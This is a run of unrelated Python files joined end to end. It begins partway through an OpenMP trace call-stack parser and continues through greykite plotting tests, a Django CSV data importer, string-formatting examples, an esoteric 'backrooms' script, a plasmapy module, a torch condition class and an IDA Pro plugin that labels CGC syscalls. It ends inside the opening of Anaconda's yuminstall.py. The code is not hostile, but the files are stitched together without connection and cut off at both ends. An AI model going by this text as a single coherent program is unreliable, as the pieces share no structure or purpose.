entity.entity_type, entity) # if the CPU is already in parallel execution, then this implicit task region is sequential so does not matter # assuming no nested parallel regions! elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: # currently doing nothing, for for-loops I'm conisdering the work itself to announce parallel execution # if the CPU is already in parallel execution, then this implicit task region is sequential so does not matter pass elif entity.entity_type == EntityType.THREAD: logging.trace("%d:new thread:%s:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) pass elif entity.entity_type == EntityType.PARALLEL_REGION: pass elif entity.entity_type == EntityType.TASK_CREATION: # create a new call stack within saved_call_stacks call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] duplicate_call_stack = copy(call_stack) # these should refer to the same entities created_task_id = entity.identifier saved_call_stacks[created_task_id] = duplicate_call_stack else: logging.error("No parsing support for %s", entity.entity_type) raise NotImplementedError() def process_exit(entity, saved_call_stacks, current_call_stack_per_cpu, top_level_entities, exits, exit_idx): if entity.entity_type == EntityType.STACKFRAME: # find the correct callstack and remove the top frame (they should be the same frame!) call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] if len(call_stack) == 0: logging.error("Processing stack frame exit and there was no entity on top of stack,") raise ValueError() top_of_stack = call_stack[-1] if top_of_stack is not entity: logging.error("Processing stack frame exit and it was not top of stack.") raise ValueError() # each of these stacks has a separate roll back to replace the disconnected entity saved_rolled_back_entity_stacks = {} # first in last out # so we don't duplicate the same thing multiple times, save each one that we duplicate common across the stacks unique_rolled_back_entities = {} rolled_back_entities = False if not (entity.group == top_of_stack.group and entity.end == top_of_stack.end): rolled_back_entities = True # now find all the stacks that have the entity we have just left for stack_name in current_call_stack_per_cpu[entity.cpu]: temp_call_stack = saved_call_stacks[stack_name] if entity in temp_call_stack: rolled_back_entities = [] roll_back_idx = -1 while(True): if temp_call_stack[roll_back_idx] is entity: # this is gauranteed to happen at some point before roll_back_idx goes out of bounds # if it is already the top of this stack, do nothing # if we are processing replacements, we will pop it later break else: dup_identifier = temp_call_stack[roll_back_idx].group + "_" + str(temp_call_stack[roll_back_idx].end) if dup_identifier in unique_rolled_back_entities: rolled_back_entities.append(unique_rolled_back_entities[dup_identifier]) else: # duplicate the entity and change it's end time to now duplicated_entity = copy(temp_call_stack[roll_back_idx]) duplicated_entity.child_entities = [] duplicated_entity.parent_entity = [] duplicated_entity.parallelism_intervals = [] duplicated_entity.start = entity.end temp_call_stack[roll_back_idx].end = entity.end rolled_back_entities.append(duplicated_entity) unique_rolled_back_entities[dup_identifier] = duplicated_entity logging.trace("Processing disconnect: looking for exit associated with %s:%s:%s", temp_call_stack[roll_back_idx].group, temp_call_stack[roll_back_idx].start, temp_call_stack[roll_back_idx].identifier) if temp_call_stack[roll_back_idx].group == "omp_forked_execution": # there is no exit to replace roll_back_idx -= 1 continue roll_back_idx -= 1 # go forward in the exits array and replace the original entity's exit with the duplicated one # TODO this is really inefficient, I should simply have a reference to the exit in the entry data structure tmp_exit_idx = exit_idx while(True): if exits[tmp_exit_idx] is temp_call_stack[-1]: exits[tmp_exit_idx] = duplicated_entity break else: tmp_exit_idx += 1 saved_rolled_back_entity_stacks[stack_name] = rolled_back_entities # either the top of the stack was the entity, or we have rolled back some entities # first, we need to pop the entity if rolled_back_entities == False: call_stack.pop() else: # now remove the top of each stack where the entity is the top, then roll out the duplicate entities to replace the subtree for stack_name, duplicate_entities in saved_rolled_back_entity_stacks.items(): stack = saved_call_stacks[stack_name] # remove the ended entity stack.pop() # this happens even if nothing was rolled back in this stack (i.e. the entity was already at the top of the call stack) # replace the subtree for duplicate_entity in reversed(duplicate_entities): if len(stack) == 0: top_level_entities.append(duplicate_entity) else: duplicate_entity.parent_entity = stack[-1] stack[-1].child_entities.append(duplicate_entity) stack.append(duplicate_entity) duplicate_entity.depth = len(stack) logging.trace("%d:popped from stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) elif entity.entity_type == EntityType.SYNC_REGION: pass elif entity.entity_type == EntityType.TASK_REGION: # if the region is over, I can remove the instance from the saved call stacks task_id = entity.identifier if task_id not in saved_call_stacks: logging.error("Could not find the task id %d in the saved call stacks when I exited the task.", task_id) raise ValueError() del saved_call_stacks[task_id] elif entity.entity_type == EntityType.TASK_PERIOD: # stop executing on this call stack by popping it (it still exists in saved_call_stacks to come back to later) left_task_id = entity.identifier if left_task_id not in saved_call_stacks: logging.error("Could not find the task id %d in the saved call stacks when I exited one of its task periods.", left_task_id) raise ValueError() if current_call_stack_per_cpu[entity.cpu][-1] != left_task_id: logging.error("Processing task exit and it was not top of stack.") raise ValueError() if len(current_call_stack_per_cpu[entity.cpu]) > 1: logging.trace("%d:deleted stack:%s:returning to stack:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], current_call_stack_per_cpu[entity.cpu][-2], entity.group, entity.entity_type, entity) else: logging.trace("%d:deleted stack:%s:returning to no active stack:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) current_call_stack_per_cpu[entity.cpu].pop() elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: pass elif entity.entity_type == EntityType.WORK: logging.trace("%d:leaving work:%s:%s:%s:%s", entity.cpu, current_call_stack_per_cpu[entity.cpu][-1], entity.group, entity.entity_type, entity) # remove the omp_parallel_loop from the current stack call_stack = saved_call_stacks[current_call_stack_per_cpu[entity.cpu][-1]] if len(call_stack) == 0: logging.error("Exiting work entity, and there is no entity on top of stack,") raise ValueError() top_of_stack = call_stack[-1] if top_of_stack is not entity: logging.error("Processing work entity exit, and it was not top of stack.") raise ValueError() # for OpenMP for-loops, once the work region is finished, we can kill the call stack nested_level = 0 for stack_name in current_call_stack_per_cpu[entity.cpu]: if "omp_thread_" in stack_name: nested_level += 1 nested_level -= 1 # we are removing the nested level before if nested_level == 0: call_stack.pop() # remove the parallel loop entity del saved_call_stacks["omp_thread_" + str(entity.cpu) + "_" + str(nested_level)] current_call_stack_per_cpu[entity.cpu].pop() elif entity.entity_type == EntityType.THREAD: pass elif entity.entity_type == EntityType.PARALLEL_REGION: pass else: logging.error("No parsing support for %s", entity.entity_type) raise NotImplementedError() def update_parallelism_intervals_for_cpu( is_start, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_time_per_cpu, main_cpu): logging.trace("Updating intervals for a %s event.", ("start" if is_start else "end")) updated_processed_time = (entity.start if is_start else entity.end) previous_processed_time = previous_processed_time_per_cpu[entity.cpu] if previous_processed_time != -1: stack_ids = current_call_stack_per_cpu[entity.cpu] if len(stack_ids) > 0: call_stack_id = stack_ids[-1] call_stack = saved_call_stacks[call_stack_id] # Each CPU should have all of its entities assigned the interval interval = updated_processed_time - previous_processed_time top_of_stack = True for stack_entity in reversed(call_stack): stack_entity.add_parallelism_interval(prior_parallelism, interval, entity.cpu) if top_of_stack: #stack_entity.add_per_cpu_top_of_stack_parallelism_interval(prior_parallelism, interval, entity.cpu) stack_entity.add_top_of_stack_parallelism_interval(prior_parallelism, interval) #stack_entity.add_top_of_stack_interval(interval, entity.cpu) top_of_stack = False if "omp_parallel_loop" in stack_entity.group and entity.cpu != main_cpu: break updated_processed_times_per_cpu = previous_processed_time_per_cpu updated_processed_times_per_cpu[entity.cpu] = updated_processed_time return updated_processed_times_per_cpu def update_parallelism_intervals_on_entry( entity, saved_call_stacks, current_call_stack_per_cpu, work_state_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu): # We don't need to update the parallelism intervals if the parallelism isn't changing updated_processed_times_per_cpu = previous_processed_times_per_cpu updated_parallelism = prior_parallelism if entity.entity_type == EntityType.STACKFRAME: # update the parallelism interval before we change the top of the stack updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( True, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) elif entity.entity_type == EntityType.SYNC_REGION: # update the parallelism interval before we got to this region updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( True, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu][-1] work_state_stack_per_cpu[entity.cpu].append(False) if current_work_state == True: # going from work to non work logging.trace("%s:swap to not active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism -= 1 elif entity.entity_type == EntityType.TASK_REGION: pass elif entity.entity_type == EntityType.TASK_PERIOD: # TODO pass elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: pass elif entity.entity_type == EntityType.WORK: # update the parallelism interval before we got to this region updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( True, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu][-1] work_state_stack_per_cpu[entity.cpu].append(True) if current_work_state == False: # going from work to non work logging.trace("%s:swap to active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism += 1 elif entity.entity_type == EntityType.THREAD: pass elif entity.entity_type == EntityType.PARALLEL_REGION: pass elif entity.entity_type == EntityType.TASK_CREATION: pass else: logging.error("No parsing support for %s", entity.entity_type) raise NotImplementedError() return updated_parallelism, updated_processed_times_per_cpu def update_parallelism_intervals_on_exit( entity, saved_call_stacks, current_call_stack_per_cpu, work_state_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu): updated_processed_time = previous_processed_times_per_cpu updated_parallelism = prior_parallelism if entity.entity_type == EntityType.STACKFRAME: # update the parallelism interval before we change the top of the stack updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( False, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: pass elif (entity.entity_type == EntityType.SYNC_REGION or entity.entity_type == EntityType.WORK): updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( False, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu].pop() if current_work_state == True: if work_state_stack_per_cpu[entity.cpu][-1] == True: pass # no change else: # going from work to non work logging.trace("%s:swap to not active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism -= 1 else: if work_state_stack_per_cpu[entity.cpu][-1] == True: # going from non-work to work logging.trace("%s:swap to active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism += 1 else: pass # no change elif entity.entity_type == EntityType.TASK_REGION: pass elif entity.entity_type == EntityType.TASK_PERIOD: # if we are leaving a task period, we are stopping updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( False, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu].pop() if current_work_state == True: if work_state_stack_per_cpu[entity.cpu][-1] == True: pass # no change else: # going from work to non work logging.trace("%s:swap to not active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism -= 1 else: # TODO should this happen?? how can I be leaving a task period yet be in non-work?? if work_state_stack_per_cpu[entity.cpu][-1] == True: # going from non-work to work logging.trace("%s:swap to active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism += 1 else: pass # no change elif entity.entity_type == EntityType.IMPLICIT_TASK_REGION: updated_processed_times_per_cpu = update_parallelism_intervals_for_cpu( False, entity, saved_call_stacks, current_call_stack_per_cpu, prior_parallelism, previous_processed_times_per_cpu, main_cpu) current_work_state = work_state_stack_per_cpu[entity.cpu].pop() if current_work_state == True: if work_state_stack_per_cpu[entity.cpu][-1] == True: pass # no change else: # going from work to non work logging.trace("%s:swap to not active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism -= 1 else: if work_state_stack_per_cpu[entity.cpu][-1] == True: # going from non-work to work logging.trace("%s:swap to active parallelism:%s:%s:%s", entity.cpu, entity.group, entity.entity_type, entity) updated_parallelism += 1 else: pass # no change elif entity.entity_type == EntityType.THREAD: pass elif entity.entity_type == EntityType.PARALLEL_REGION: pass elif entity.entity_type == EntityType.TASK_CREATION: pass else: logging.error("No parsing support for %s", entity.entity_type) raise NotImplementedError() return updated_parallelism, updated_processed_times_per_cpu """ This function reads the constructs from the trace file, and parses them to build a tree of related entities Each entitiy has intervals for its time-on-stack, time-on-top-of-stack, parallelism, and so on """ def process_events(filename): # parse all of the events into one list of entries/exits # sort the events by time # then iterate over each event, processing them according to their type entries, exits, unique_groups, max_cpu, main_cpu, min_timestamp, max_timestamp = parse_trace(filename) # Every task must have its own callstack that it works on # When it creates a task, it copies its callstack over to the new task # All call stacks should just hold references to the same entities # If I have created a task which I am not executing, then I do some other stuff # And another CPU picks up that task, that other CPU should execute the task as a child of the function that created it logging.debug("Processing the constructs found in the tracefile.") logging.trace("The main CPU was: %d", main_cpu) saved_call_stacks = {} saved_call_stacks["init"] = [] current_call_stack_per_cpu = {} work_state_stack_per_cpu = {} for i in range(max_cpu+1): if i == main_cpu: work_state_stack_per_cpu[i] = [True] current_call_stack_per_cpu[i] = ["init"] # only the main cpu has an initial call stack! else: work_state_stack_per_cpu[i] = [False] current_call_stack_per_cpu[i] = [] current_parallelism = 1 current_processed_times_per_cpu = [-1 for _ in range(max_cpu+1)] total_parallelism_entry_time = 0.0 total_parallelism_exit_time = 0.0 total_process_entry_time = 0.0 total_process_exit_time = 0.0 max_depth = [0] unique_cpus = [] top_level_entities = [] entry_idx = 0 exit_idx = 0 while(True): next_entity_is_exit, next_entity, entry_idx, exit_idx = get_next_entity(entries, exits, entry_idx, exit_idx) if next_entity is None: break if next_entity_is_exit == False: if next_entity.cpu not in unique_cpus: unique_cpus.append(next_entity.cpu) logging.trace("%d:%d:ENTRY:%s:%s:%s:task_identifier was %s and parent identifier was %s", next_entity.start, next_entity.cpu, next_entity.group, next_entity.entity_type, next_entity, next_entity.identifier, next_entity.parent_id) if debug_mode(): t0 = time.time() current_parallelism, current_processed_time = update_parallelism_intervals_on_entry(next_entity, saved_call_stacks, current_call_stack_per_cpu, work_state_stack_per_cpu, current_parallelism, current_processed_times_per_cpu, main_cpu) if debug_mode(): t1 = time.time() total_parallelism_entry_time += (t1 - t0) process_entry(next_entity, saved_call_stacks, current_call_stack_per_cpu, top_level_entities, max_depth) if debug_mode(): t2 = time.time() total_process_entry_time += (t2 - t1) elif next_entity_is_exit == True: logging.trace("%d:%d:EXIT:%s:%s:%s:task_identifier was %s and parent identifier was %s", next_entity.start, next_entity.cpu, next_entity.group, next_entity.entity_type, next_entity, next_entity.identifier, next_entity.parent_id) if debug_mode(): t0 = time.time() current_parallelism, current_processed_time = update_parallelism_intervals_on_exit(next_entity, saved_call_stacks, current_call_stack_per_cpu, work_state_stack_per_cpu, current_parallelism, current_processed_times_per_cpu, main_cpu) if debug_mode(): t1 = time.time() total_parallelism_exit_time += (t1 - t0) process_exit(next_entity, saved_call_stacks, current_call_stack_per_cpu, top_level_entities, exits, exit_idx) if debug_mode(): t2 = time.time() total_process_exit_time += (t2 - t1) logging.debug("Finished processing the constructs found in the tracefile.") if debug_mode(): logging.debug("Timings:") logging.debug("Total parallelism entry processing time: %f", total_parallelism_entry_time) logging.debug("Total parallelism exit processing time: %f", total_parallelism_exit_time) logging.debug("Total entry processing time: %f", total_process_entry_time) logging.debug("Total exit processing time: %f", total_process_exit_time) return top_level_entities, unique_groups, max_depth[0], min_timestamp, max_timestamp, unique_cpus import datetime import math from functools import partial import matplotlib import numpy as np import pandas as pd import scipy.stats from greykite.common.viz.timeseries_plotting_mpl import plt_compare_timeseries from greykite.common.viz.timeseries_plotting_mpl import plt_longterm_ts_agg from greykite.common.viz.timeseries_plotting_mpl import plt_overlay_long_df from greykite.common.viz.timeseries_plotting_mpl import plt_overlay_with_bands matplotlib.use("agg") # noqa: E402 def test_plt_compare_timeseries(): date_list = pd.date_range( start=datetime.datetime(2018, 6, 1), periods=24 * 600, freq="H").tolist() df = pd.DataFrame({"ts": date_list}) df1 = df.copy() df2 = df.copy() value_col = "y" df1[value_col] = np.random.normal(size=df1.shape[0]) df2[value_col] = np.random.normal(size=df2.shape[0]) plt_compare_timeseries( df_dict={"obs": df1, "forecast": df2}, time_col="ts", value_col="y", start_time=datetime.datetime(2019, 9, 1), end_time=datetime.datetime(2019, 9, 10)) # custom legends plt_compare_timeseries( df_dict={"obs": df1, "forecast": df2}, time_col="ts", value_col="y", legends_dict={"obs": "observed", "forecast": "silverkite forecast"}, start_time=datetime.datetime(2019, 9, 1), end_time=datetime.datetime(2019, 9, 10)) # custom colors plt_compare_timeseries( df_dict={"obs": df1, "forecast": df2}, time_col="ts", value_col="y", colors_dict={"obs": "red", "forecast": "green"}, start_time=datetime.datetime(2019, 9, 1), end_time=datetime.datetime(2019, 9, 10)) def test_plt_overlay_long_df(): m = 200 x = np.array(list(range(m)) * m) / (1.0 * m) x = x * 2 * math.pi z = [] for u in range(m): z = z + [u] * m y = np.sin(x) + np.random.normal(0, 1, len(x)) w = np.cos(x) + np.random.normal(0, 1, len(x)) df = pd.DataFrame({"x": x, "y": y, "z": z, "w": w}) agg_dict = { "y": [np.nanmean, partial(np.nanpercentile, q=25), partial(np.nanpercentile, q=75)], "w": np.nanmean } agg_col_names = ["mean", "lower", "upper", "w"] x_col = "x" y_col = "y" split_col = "z" df_plt = plt_overlay_long_df( df=df, x_col=x_col, y_col=y_col, split_col=split_col, plt_title="", agg_dict=agg_dict, agg_col_names=agg_col_names) assert list(df_plt.columns) == ["x"] + agg_col_names def test_plt_overlay_with_bands(): m = 200 x = np.array(list(range(m)) * m) / (1.0 * m) x = x * 2 * math.pi z = [] for u in range(m): z = z + [u] * m y = np.sin(x) + np.random.normal(0, 1, len(x)) df = pd.DataFrame({"x": x, "y": y, "z": z}) x_col = "x" y_col = "y" split_col = "z" plt_overlay_with_bands( df=df, x_col=x_col, y_col=y_col, split_col=split_col, perc=[25, 75], overlay_color="black", agg_col_colors=None, plt_title=None) def test_plt_longterm_ts_agg_fixed_color(): """Testing `plt_longterm_ts_agg` with fixed color across""" r = 10.0 x = np.linspace(2.0, 2.0 + r, num=100) y = np.linspace(3.0, 3.0 + r, num=100) ** 2 + np.random.normal(0, 20, 100) df = pd.DataFrame({"x": x, "y": y}) df["window"] = df["x"].map(round) plt_longterm_ts_agg( df=df, time_col="x", window_col="window", value_col="y", agg_func=np.nanmean, plt_title="fixed color", color="blue") def test_plt_longterm_ts_agg_changing_color(): """Testing `plt_longterm_ts_agg` with changing color across the curve""" r = 10.0 x = np.linspace(2.0, 2.0 + r, num=100) y = np.linspace(3.0, 3.0 + r, num=100) ** 2 + np.random.normal(0, 20, 100) z = ["red"]*20 + ["green"]*20 + ["blue"]*60 df = pd.DataFrame({"x": x, "y": y, "z": z}) df["window"] = df["x"].map(round) plt_longterm_ts_agg( df=df, time_col="x", window_col="window", value_col="y", color_col="z", agg_func=np.nanmean, plt_title="changing_color", color=None) def test_plt_longterm_ts_agg_custom_choose_color(): """Testing `plt_longterm_ts_agg` with custom choice of color""" r = 10.0 x = np.linspace(2.0, 2.0 + r, num=100) y = np.linspace(3.0, 3.0 + r, num=100) ** 2 + np.random.normal(0, 20, 100) z = ["red"]*20 + ["green"]*20 + ["blue"]*60 df = pd.DataFrame({"x": x, "y": y, "z": z}) df["window"] = df["x"].map(round) # we define a custom `choose_color_func` # this function returns the most common color seen for the give slice def choose_color_func(x): return scipy.stats.mode(x)[0][0] plt_longterm_ts_agg( df=df, time_col="x", window_col="window", value_col="y", color_col="z", agg_func=np.nanmean, plt_title="changing_color", color=None, choose_color_func=choose_color_func) import os from django.apps import apps from django.conf import settings from pipeline.constants import SOURCE_DATABC, SOURCE_OPENCA from pipeline.models.general import DataSource from pipeline.importers.communities import import_communities_from_csv from pipeline.importers.projects import import_projects from pipeline.importers.utils import (import_data_into_point_model, read_csv, import_civic_leaders_from_csv, get_databc_last_modified_date, import_services, get_openca_last_modified_date, import_bc_assessment_data) FILES_DIR = settings.BASE_DIR def import_csv_resources(resource_type): csv_resource_names = DataSource.objects.filter(source_type="csv").values_list("name", flat=True) if resource_type not in ['all', *csv_resource_names]: print("Error: Resource type {} not supported".format(resource_type)) return if resource_type == "all": for available_resource_type in csv_resource_names: import_resource(available_resource_type) else: import_resource(resource_type) def import_resource(resource_type): data_source = DataSource.objects.get(name=resource_type) file_path = os.path.join(FILES_DIR, data_source.source_file_path) # TODO SY - move this into constants? location_csv_resources = [ 'first_responders', 'diagnostic_facilities', 'timber_facilities', 'civic_facilities', 'closed_mills', 'airports', 'port_and_terminal', 'eao_projects', 'laboratory_service', 'local_govt_offices', 'emergency_social_service_facilities', 'natural_resource_projects', 'customs_ports_of_entry', 'pharmacies', 'public_library', 'first_nations_health_authority' ] bca_resources = [ 'bc_assessment_census_subdivision', 'bc_assessment_economic_region', 'bc_assessment_regional_district' ] if resource_type == "communities": import_communities_from_csv(file_path) elif resource_type == "civic_leaders": import_civic_leaders_from_csv(file_path) elif resource_type == "services": import_services(file_path) elif resource_type == "projects": import_projects(file_path) elif resource_type in bca_resources: model_class = apps.get_model("pipeline", data_source.model_name) import_bc_assessment_data(file_path, model_class, resource_type) elif resource_type in location_csv_resources: data = read_csv(data_source.source_file_path) for row in data: model_class = apps.get_model("pipeline", data_source.model_name) import_data_into_point_model(resource_type, model_class, row) else: print("Error: Resource type {} not supported".format(resource_type)) if data_source.source == SOURCE_DATABC: data_source.last_updated = get_databc_last_modified_date(data_source) data_source.save() elif data_source.source == SOURCE_OPENCA: data_source.last_updated = get_openca_last_modified_date(data_source) data_source.save() my_str = "{} is {} years old".format("Peter", 50) # Peter is 50 years old my_str = "{0} is {1} years old. {1} years old!".format("Peter", 50) # Peter is 50 years old. 50 years old! data = {'name': 'Peter', 'age': 50} my_str = "{name} is {age} years old.".format(**data) # Peter is 50 years old. my_str = "{p[name]} is {p[age]} years old.".format(p=data) # Peter is 50 years old. <filename>backrooms/backrooms_builtins/brs_hard_vector.py """ Copyright 2021 <NAME> """ # backrooms from backrooms.translator import StringHandler NAME = "h_vector" SCRIPT = """ %utils # WS[...] -> WS[size, ...] ~SIZE />rs"_SIZE"hcphr ~_SIZE />ri0ri9hr # WS[item, ...] -> WS[...] ~APPEND />rs"SIZE"hck0dfrs"_START"hg-zisk1fzrs"utils"rs"NEW"hlfs1rs"utils"rs"KEEP"hls0+frs"_SIZE"rs"utils"rs"KEEP"hlhr # WS[...] -> WS[item, ...] ~POP />rs"SIZE"hcZV-k0rs"READ"hcfs0bcrs"utils"rs"REMOVE"hls0frs"_SIZE"rs"utils"rs"KEEP"hlhr / >prnhr # WS[...] -> WS[item, ...] ~PEAK />rs"SIZE"hcZV-rs"READ"hchr / >prnhr # WS[spot, ...] -> WS[item, ...] ~READ />bcfzrs"utils"rs"STORE"hlhr # WS[spot, item, ...] -> WS[...] ~WRITE />bcfzrs"utils"rs"KEEP"hlhr # WS[spot, ...] -> WS[...] ~REMOVE /V >ppprs"POP"hcphr />ic+rs"SIZE"hcz>uoisZ^pddrs"READ"V / ^+ch"ETIRW"sr-zch.< # WS[spot, item, ...] -> WS[...] ~INSERT /V >pprs"WRITE"hchr />icd-k0prs"SIZE"hc-rnrs"APPEND"hc>ds0isZ^pddrs"READ"V / ^-ch"ETIRW"sr+zch..< # WS[item, ...] -> WS[...] ~FIND_INSERT /V V..............................p2kp< />k0pri0k1prs"SIZE"hck2ZVps0ri0rs"READ"hcis.GVZV>ps0s2-rs"READ"hcisLVZVp>s2s1isri2ids1iadrs"READ"hcs0isGVZV^ / rhch"DNEPPA"sr0sp<rhch"TRESNI"sr0ir0sp<.< rhch"DNEPPA"sr0sp<.< ^....p1kppVZVLsi0sch"DAER"srd+dp<.< / >.>ps0zrs"INSERT"hcphr ~_START / """ def get_handler() -> StringHandler: """ info: Gets script handler. :return: StringHandler """ return StringHandler(NAME, SCRIPT) <filename>plasmapy/dispersion/__init__.py """ The `~plasmapy.dispersion` subpackage contains functionality associated with plasma dispersion relations, including numerical solvers and `~plasmapy.dispersion.analytical` solutions. """ __all__ = [ "plasma_dispersion_func", "plasma_dispersion_func_deriv", ] # TODO: import plasmapy.dispersion.numerical once it is populated with # functionality (i.e. expose to namespace) from plasmapy.dispersion import analytical from plasmapy.dispersion.dispersionfunction import ( plasma_dispersion_func, plasma_dispersion_func_deriv, ) """ """ import torch from .location import Location class Condition: def __init__(self, *args, **kwargs): if len(args) == 2 and not kwargs: if (isinstance(args[0], torch.Tensor) and isinstance(args[1], torch.Tensor)): self.input_points = args[0] self.output_points = args[1] elif isinstance(args[0], Location) and callable(args[1]): self.location = args[0] self.function = args[1] elif isinstance(args[0], Location) and isinstance(args[1], list): self.location = args[0] self.function = args[1] else: raise ValueError elif not args and len(kwargs) == 2: if 'input_points' in kwargs and 'output_points' in kwargs: self.input_points = kwargs['input_points'] self.output_points = kwargs['output_points'] elif 'location' in kwargs and 'function' in kwargs: self.location = kwargs['location'] self.function = kwargs['function'] else: raise ValueError else: raise ValueError <reponame>0xddaa/iddaa import idaapi import iddaa.utils as utils import idc import re debug = False version = (1, 0, 0) syscall_table = { 1: '_terminate', 2: 'transmit', 3: 'receive', 4: 'fdwait', 5: 'allocate', 6: 'deallocate', 7: 'random' } class CGCHelper(idaapi.plugin_t): flags = idaapi.PLUGIN_UNL comment = 'CGC Helper' help = 'Press Shift-R to revise syscall to CGC defined.' wanted_name = 'CGC Helper' wanted_hotkey = '' def init(self): print('CGC Helper ({}) plugin has been loaded.'.format(utils.dump_version(version))) hotkey_ctx = idaapi.add_hotkey('Shift-R', CGCHelper.revise_syscall) if hotkey_ctx: print(self.help) return idaapi.PLUGIN_KEEP else: print('Failed to register CGCHelper hotkey!') del hotkey_ctx return idaapi.PLUGIN_SKIP def run(self, arg): pass def term(self): pass @staticmethod def revise_syscall(rename=False): if not rename: print('Change the function name with `CGCHeler.revise_syscall(True)`.') # visit all instructions start_ea, end_ea = utils.get_seg_range('.text') eax = -1 ip = start_ea while ip < end_ea and ip != idaapi.BADADDR: if 'int' in idc.GetMnem(ip) and '80h' == idc.GetOpnd(ip, 0): if eax != -1: # fix comment and function name print('{}: {}'.format(hex(ip), syscall_table[eax])) idc.MakeComm(ip, 'CGC syscall: {}'.format(syscall_table[eax])) if rename: print('Change {} to {}'.format(idc.GetFunctionName(ip), syscall_table[eax])) idc.MakeName(idc.GetFunctionAttr(ip, idc.FUNCATTR_START), syscall_table[eax]) elif 'mov' in idc.GetMnem(ip) and 'eax' == idc.GetOpnd(ip, 0) and 5 == idc.GetOpType(ip, 1): value = idc.GetOpnd(ip, 1) if re.search('^[0-9]+$', value) != None: eax = int(value) if eax > 7 or eax < 1: eax = -1 ip = idc.NextHead(ip) def PLUGIN_ENTRY(): return CGCHelper() <gh_stars>0 # # yuminstall.py # # Copyright (C) 2005, 2006, 2007 Red Hat, Inc. All rights reserved. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # from flags import flags from errors import * from ConfigParser import ConfigParser import sys import os import os.path import shutil import time import warnings import types import locale import glob import tempfile import itertools import re import anaconda_log import rpm import rpmUtils import urlgrabber.progress import urlgrabber.grabber from urlgrabber.grabber import URLGrabber, URLGrabError import yum import iniparse from yum.constants import * from yum.Errors import * from yum.misc import to_unicode from yum.yumRepo import YumRepository from backend import AnacondaBackend from product import * from sortedtransaction import SplitMediaTransactionData from constants import * from image import * from compssort import * import packages import iutil import gettext _ = lambda x: gettext.ldgettext("anaconda", x) P_ = lambda x, y, z: gettext.ldngettext("anaconda", x, y, z) import network # specspo stuff rpm.addMacro("_i18ndomains", "redhat-dist") import logging log = logging.getLogger("anaconda") import urlparse urlparse.uses_fragment.append('media') urlgrabber.grabber.default_grabber.opts.user_agent = "%s (anaconda)/%s" %(productName, productVersion) import iutil import isys def size_string (size): def number_format(s): return locale.format("%s", s, 1) retval = None if size > 1024 * 1024: size = size / (1024*1024) retval = _("%s MB") %(number_format(size),) elif size > 1024: size = size / 1024 retval = _("%s KB") %(number_format(size),) else: retval = P_("%s Byte", "%s Bytes", size) % (number_format(size),) return to_unicode(retval) class AnacondaCallback: def __init__(self, ayum, anaconda, instLog, modeText): self.repos = ayum.repos self.ts = ayum.ts self.ayum = ayum self.messageWindow = anaconda.intf.messageWindow self.pulseWindow = anaconda.intf.progressWindow self.progress = anaconda.id.instProgress self.progressWindowClass = anaconda.intf.progressWindow self.rootPath = anaconda.rootPath self.initWindow = None self.progressWindow = None self.lastprogress = 0 self.incr = 20 self.instLog = instLog self.modeText = modeText self.openfile = None self.inProgressPo = None def setSizes(self, numpkgs, totalSize, totalFiles): self.numpkgs = numpkgs self.totalSize = totalSize self.totalFiles = totalFiles self.donepkgs = 0 self.doneSize = 0 self.doneFiles = 0 def callback(self, what, amount, total, h, user): if what == rpm.RPMCALLBACK_TRANS_START: # step 6 is the bulk of the ts processing time if amount == 6: self.progressWindow = \ self.progressWindowClass (_("Preparing to install"), _("Preparing transaction from installation source"), total) self.incr = total / 10 if what == rpm.RPMCALLBACK_TRANS_PROGRESS: if self.progressWindow and amount > self.lastprogress + self.incr: self.progressWindow.set(amount) self.lastprogress = amount if what == 